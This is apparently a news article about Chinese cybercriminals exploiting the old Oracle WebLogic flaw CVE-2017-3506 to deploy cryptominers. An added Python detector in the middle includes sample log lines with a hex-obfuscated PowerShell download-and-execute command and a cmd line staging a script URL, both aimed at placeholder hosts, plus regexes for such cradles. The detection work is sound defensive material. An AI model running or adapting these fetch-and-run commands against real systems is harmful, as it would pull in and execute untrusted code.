7-year-old Oracle WebLogic bug under active exploitation

Experts say Big Red will probably re-release patch in an upcoming cycle


A seven-year-old Oracle vulnerability is the latest to be added to CISA's Known Exploited Vulnerabilities (KEV) catalog, meaning the security agency considers it a significant threat to the federal government and, under Binding Operational Directive 22-01, requires federal civilian agencies to remediate it by a set deadline.

CVE-2017-3506 affects Oracle's WebLogic Server, allowing remote command execution on the host operating system. Rated CVSS 7.4, it was originally patched in April 2017, but recent research suggests it is now being exploited by financially motivated Chinese cybercriminals.

According to security shop Trend Micro's recent work, the group it tracks as Water Sigbin (also known as 8220 Gang) is weaponizing CVE-2017-3506 alongside a second, more recent Oracle WebLogic vuln (CVE-2023-21839) to deploy cryptocurrency miners on targeted hosts.

"Water Sigbin's activities involving the exploitation of CVE-2017-3506 and CVE-2023-21839 underscore the adaptability of modern threat actors," wrote Sunil Bharti, senior threat researcher at Trend Micro.

"The use of sophisticated obfuscation techniques such as hexadecimal encoding of URLs, complex encoding within PowerShell and batch scripts, use of environment variables, and layered obfuscation to conceal malicious code within seemingly benign scripts demonstrates that Water Sigbin is a threat actor that can capably hide its tracks, making detection and prevention more challenging for security teams."
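The hex-encoded URLs and environment-variable staging described in that quote are easy to miss with plain string matching, because the URL never appears in cleartext on the command line. The following is an added detection example, not Trend Micro's code or any artifact from the Water Sigbin campaign: it scans constructed process-creation log lines (the hostnames, parent processes, and the example.invalid URLs are all made up for this example), decodes any long hexadecimal run that yields printable ASCII, and flags lines that hide a URL that way, that stage a value in an environment variable, or that pair a PowerShell download with Invoke-Expression.

```python
import re
from typing import Dict, List

# Constructed sample process-creation lines: "<host> <parent> <command line>".
# The hex blobs are the ASCII hex of "http://example.invalid/load.ps1" and
# "https://example.invalid/x.bat"; none of this is real campaign telemetry.
SAMPLE_LOG = [
    "web01 java.exe powershell.exe -nop -w hidden -c \"$u=[System.Text.Encoding]::ASCII.GetString("
    "[byte[]]('687474703a2f2f6578616d706c652e696e76616c69642f6c6f61642e707331' -split '(..)' -ne '' "
    "| % {[Convert]::ToByte($_,16)}));iex (iwr $u)\"",
    "web01 explorer.exe notepad.exe C:\\Users\\alice\\notes.txt",
    "web02 java.exe cmd.exe /c set x=68747470733a2f2f6578616d706c652e696e76616c69642f782e626174 && echo %x%",
]

# A run of at least 8 byte-pairs of hex, not touching other hex digits on either side.
# Odd-length runs cannot be a byte string and are deliberately not matched.
HEX_RUN = re.compile(r"(?<![0-9a-fA-F])((?:[0-9a-fA-F]{2}){8,})(?![0-9a-fA-F])")
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Invoke-Expression combined with a web fetch, in either order.
PS_CRADLE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring|downloadfile)\b"
    r"|\b(?:iwr|invoke-webrequest|downloadstring|downloadfile)\b.*\b(?:iex|invoke-expression)\b",
    re.IGNORECASE,
)
# cmd.exe "set NAME=" or PowerShell "$env:NAME =" used to stage a value for later expansion.
ENV_STAGE = re.compile(r"\bset\s+\w+=|\$env:\w+\s*=", re.IGNORECASE)


def decode_hex_runs(text: str) -> List[str]:
    """Return every hex run in text that decodes to printable ASCII.

    Runs that decode to non-ASCII or non-printable bytes (hashes, binary
    blobs) are dropped, which keeps SHA-1/SHA-256 digests out of the results.
    """
    decoded: List[str] = []
    for match in HEX_RUN.finditer(text):
        try:
            candidate = bytes.fromhex(match.group(1)).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if candidate.isprintable():
            decoded.append(candidate)
    return decoded


def analyze_line(line: str) -> Dict[str, object]:
    """Decode hidden strings in one log line and attach detection flags."""
    decoded = decode_hex_runs(line)
    urls = [s for s in decoded if URL_RE.match(s)]
    flags: List[str] = []
    if urls:
        flags.append("hex_encoded_url")
    if PS_CRADLE.search(line):
        flags.append("powershell_download_cradle")
    if ENV_STAGE.search(line):
        flags.append("env_var_staging")
    return {"line": line, "decoded": decoded, "urls": urls, "flags": flags}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the lines that raised at least one flag."""
    return [result for result in (analyze_line(l) for l in lines) if result["flags"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["flags"], hit["urls"])
```

Two caveats a practitioner should keep in mind before deploying something like this: a hex run is only decoded if it is an even number of digits and yields printable ASCII, so UTF-16 or otherwise non-ASCII payloads will not be recovered, and the download-cradle and environment-variable patterns are plain regexes that legitimate administrative scripts can also trigger, so treat the flags as triage signals to be combined with parent-process context (here, a Java process such as WebLogic spawning a shell) rather than as verdicts on their own.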

Trellix (formerly FireEye and McAfee Enterprise) previously assessed that CVE-2017-3506 was also used alongside three other WebLogic bugs to break into Superion's Click2Gov servers back in 2017.

Attackers were thought to have combined the vulnerabilities into an exploit chain to ultimately steal payment card information from county governments across the US. It was the earliest known sign of attackers abusing CVE-2017-3506, and the bug is clearly still attractive enough to attackers to prompt the US government into action.

Water Sigbin was first spotted in 2017 and has focused much of its efforts since on the cryptojacking and cryptominer games, evolving its tradecraft consistently and regularly throughout that time.

The group is known for targeting Oracle WebLogic flaws, as well as log4j, Atlassian Confluence bugs, and misconfigured Docker containers to infect hosts with whatever malware it feels like using. Sometimes it's a cryptominer like XMRig, other times it's a DDoS botnet like Tsunami – it changes often.

In some cases, though, its tradecraft remains the same. Trend Micro looked into the group in May 2023 after it was observed exploiting CVE-2017-3506 in separate, earlier attacks. It said that despite some researchers branding the group "script kiddies," in Trend's view it's a "threat to be reckoned with."

As for why the necessary patches haven't been applied after so many years, Iain Saunderson, CTO at Spinnaker Support, told El Reg: "Customers don't apply because either it's too much work or the patch is not available for the version they are running, due to Oracle desupport."

Saunderson went on to say Oracle is known for re-releasing CVE patches if it deems them necessary.

"The CVE was only released once but apparently, seven years later, it was found to not have fixed the issue," he said. "I suspect Oracle will release a special patch or patch it in either July or October during their next patching cycle." ®
